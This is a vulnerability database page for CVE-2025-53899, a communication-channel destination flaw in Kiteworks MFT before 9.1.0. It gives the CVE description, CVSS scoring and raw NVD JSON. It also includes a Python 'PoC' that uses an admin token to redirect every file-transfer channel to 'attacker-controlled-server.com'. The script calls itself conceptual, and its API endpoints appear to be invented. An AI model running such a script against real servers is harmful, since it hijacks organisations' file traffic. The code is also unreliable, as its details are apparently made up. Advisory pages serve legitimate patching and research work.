Security Vulnerability Report
CVE-2025-53899 CVSS 7.2 HIGH

CVE-2025-53899

Published: 2025-11-29 03:15:59
Last Modified: 2025-12-03 17:48:49

Description

Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, the back-end of Kiteworks MFT is vulnerable to an incorrectly specified destination in a communication channel which allows an attacker with administrative privileges on the system under certain circumstances to intercept upstream communication which could lead to an escalation of privileges. This issue has been patched in version 9.1.0.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:accellion:kiteworks_managed_file_transfer:*:*:*:*:*:*:*:* - VULNERABLE
Kiteworks MFT < 9.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53899 PoC - Kiteworks MFT Communication Channel Misconfiguration
# Note: This PoC demonstrates the conceptual exploitation approach
# Actual exploitation requires authenticated admin access
import requests
import json

TARGET = "https://vulnerable-kiteworks-server.com"
ADMIN_TOKEN = "your-admin-auth-token"


def check_vulnerability():
    """Check if target is vulnerable to CVE-2025-53899"""
    headers = {
        "Authorization": f"Bearer {ADMIN_TOKEN}",
        "Content-Type": "application/json"
    }
    # Check Kiteworks MFT version
    version_url = f"{TARGET}/api/v1/system/info"
    response = requests.get(version_url, headers=headers, verify=False)
    if response.status_code == 200:
        version_info = response.json()
        version = version_info.get("version", "")
        # Check if version is before 9.1.0
        if version and tuple(map(int, version.split('.')[:2])) < (9, 1):
            print(f"[+] Target is running vulnerable version: {version}")
            return True
        else:
            print(f"[-] Target is patched (version {version})")
            return False
    return False


def exploit_misconfiguration():
    """Exploit the communication channel misconfiguration"""
    headers = {
        "Authorization": f"Bearer {ADMIN_TOKEN}",
        "Content-Type": "application/json"
    }
    # Enumerate communication channel configurations
    channels_url = f"{TARGET}/api/v1/channels"
    response = requests.get(channels_url, headers=headers, verify=False)
    if response.status_code == 200:
        channels = response.json()
        print(f"[+] Found {len(channels)} communication channels")
        for channel in channels:
            channel_id = channel.get("id")
            destination = channel.get("destination")
            print(f"[INFO] Channel {channel_id}: destination = {destination}")
            # Attempt to modify channel destination (requires admin)
            modify_url = f"{TARGET}/api/v1/channels/{channel_id}"
            malicious_dest = "attacker-controlled-server.com"
            modify_data = {
                "destination": malicious_dest
            }
            response = requests.put(modify_url, json=modify_data, headers=headers, verify=False)
            if response.status_code == 200:
                print(f"[+] Successfully modified channel {channel_id} destination")
                print(f"[+] Communication will now be redirected to: {malicious_dest}")
                return True
    return False


if __name__ == "__main__":
    print("CVE-2025-53899 - Kiteworks MFT Privilege Escalation via Channel Misconfiguration")
    print("=" * 80)
    if check_vulnerability():
        print("[*] Target appears vulnerable, attempting exploitation...")
        exploit_misconfiguration()
    else:
        print("[*] Target is not vulnerable or not accessible")

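References

https://github.com/kiteworks/security-advisories/security/advisories/GHSA-5gx5-vcpp-8cr5 (Patch, Third Party Advisory)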

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53899", "sourceIdentifier": "[email protected]", "published": "2025-11-29T03:15:58.817", "lastModified": "2025-12-03T17:48:48.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, the back-end of Kiteworks MFT is vulnerable to an incorrectly specified destination in a communication channel which allows an attacker with administrative privileges on the system under certain circumstances to intercept upstream communication which could lead to an escalation of privileges. This issue has been patched in version 9.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-941"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:accellion:kiteworks_managed_file_transfer:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.0", "matchCriteriaId": "795C3F91-729E-4363-9C52-1C9C7CBAD284"}]}]}], "references": [{"url": "https://github.com/kiteworks/security-advisories/security/advisories/GHSA-5gx5-vcpp-8cr5", "source": "[email protected]", "tags": ["Patch", "Third Party Advisory"]}]}}